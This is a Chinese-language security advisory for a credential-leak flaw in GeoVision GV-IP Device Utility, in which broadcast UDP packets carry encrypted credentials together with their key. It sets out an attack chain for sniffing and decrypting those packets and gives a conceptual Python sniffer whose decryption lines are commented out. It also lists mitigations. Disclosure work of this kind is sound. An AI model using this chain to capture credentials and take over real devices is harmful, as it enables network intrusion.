CVE-2026-7161 GeoVision凭据泄露漏洞

漏洞信息

漏洞编号

CVE-2026-7161

漏洞类型

信息泄露

CVSS评分

9.3 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

GeoVision GV-IP Device Utility

漏洞概述

GeoVision GV-IP Device Utility 9.0.5在设备认证功能中存在加密不足漏洞。当该工具通过网络向设备发送特权命令时，部分通信通过UDP广播进行，且数据包中包含了加密的用户名和密码。由于加密算法存在缺陷，解密所需的对称密钥直接包含在数据包中，导致安全性仅依赖于算法的隐晦性。处于同一局域网的攻击者可监听广播流量，提取密钥并解密凭据，从而获得设备的完全控制权。

技术细节

该漏洞的根源在于GeoVision GV-IP Device Utility处理认证信息的加密机制设计不当。当管理员使用工具与设备交互时，程序会发送包含凭据的UDP广播包。虽然数据使用了基于Blowfish的变体算法进行加密，但加密所用的对称密钥被一同封装在数据包中明文传输。这意味着攻击者无需进行复杂的密码分析，只需在局域网内进行嗅探，即可捕获广播数据包。通过解析数据包获取密钥和密文后，攻击者可利用本地算法还原出明文用户名和密码。利用这些凭据，攻击者可以接管设备，执行修改IP配置、重置设备等高危操作。

攻击链分析

STEP 1

1. 嗅探流量

攻击者接入GeoVision设备所在的局域网，并配置网络嗅探工具监听UDP广播流量。

STEP 2

2. 等待触发

攻击者等待网络管理员使用GeoVision GV-IP Device Utility工具向设备发送特权命令。

STEP 3

3. 截获数据包

当工具发送广播包时，攻击者截获包含加密凭据和对称密钥的数据包。

STEP 4

4. 解密凭据

攻击者从数据包中提取密钥和密文，利用已知的Blowfish算法还原出明文用户名和密码。

STEP 5

5. 接管设备

使用解密出的凭据登录设备，修改设备配置或重置为出厂设置。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct
from Crypto.Cipher import Blowfish
import binascii

# Conceptual Proof of Concept for CVE-2026-7161
# This script demonstrates how to sniff UDP broadcast packets and decrypt credentials.
# Note: The specific packet structure (offsets) and Blowfish implementation details
# (mode, padding) would need to be reversed engineered from the specific utility version.

def parse_and_decrypt(packet_data):
    # Hypothetical parsing logic based on the vulnerability description
    # 1. Extract the symmetric key from the packet (e.g., first X bytes)
    # 2. Extract the encrypted credentials (e.g., bytes X to Y)
    
    # Example offsets (these need to be verified against the real protocol)
    try:
        # key = packet_data[key_offset:key_offset+key_length]
        # ciphertext = packet_data[cipher_offset:cipher_offset+cipher_length]
        
        # cipher = Blowfish.new(key, Blowfish.MODE_ECB)
        # plaintext = cipher.decrypt(ciphertext)
        
        # print(f"[+] Decrypted Credentials: {plaintext}")
        pass 
    except Exception as e:
        print(f"[-] Decryption failed: {e}")

def main():
    # Setup UDP socket to listen for broadcast traffic
    # GeoVision utility typically uses a specific port, replace PORT_NUMBER
    UDP_PORT = PORT_NUMBER 
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("0.0.0.0", UDP_PORT))
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
    
    print(f"[*] Listening for GeoVision broadcast traffic on port {UDP_PORT}...")
    
    while True:
        data, addr = sock.recvfrom(1024) # Buffer size 1024
        print(f"[*] Received {len(data)} bytes from {addr[0]}")
        parse_and_decrypt(data)

if __name__ == "__main__":
    main()

影响范围

GeoVision GV-IP Device Utility 9.0.5

防御指南

临时缓解措施

在官方发布安全更新前，建议限制网络广播流量，将设备管理网络与普通网络进行VLAN隔离。同时，严格限制能够访问GeoVision设备管理端口的IP地址，减少潜在的攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7161
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7161
3 Details https://www.cvedetails.com/cve/CVE-2026-7161/
4 VulDB https://vuldb.com/cve/CVE-2026-7161
5 Link https://talosintelligence.com/vulnerability_reports/
6 Link https://www.geovision.com.tw/cyber_security.php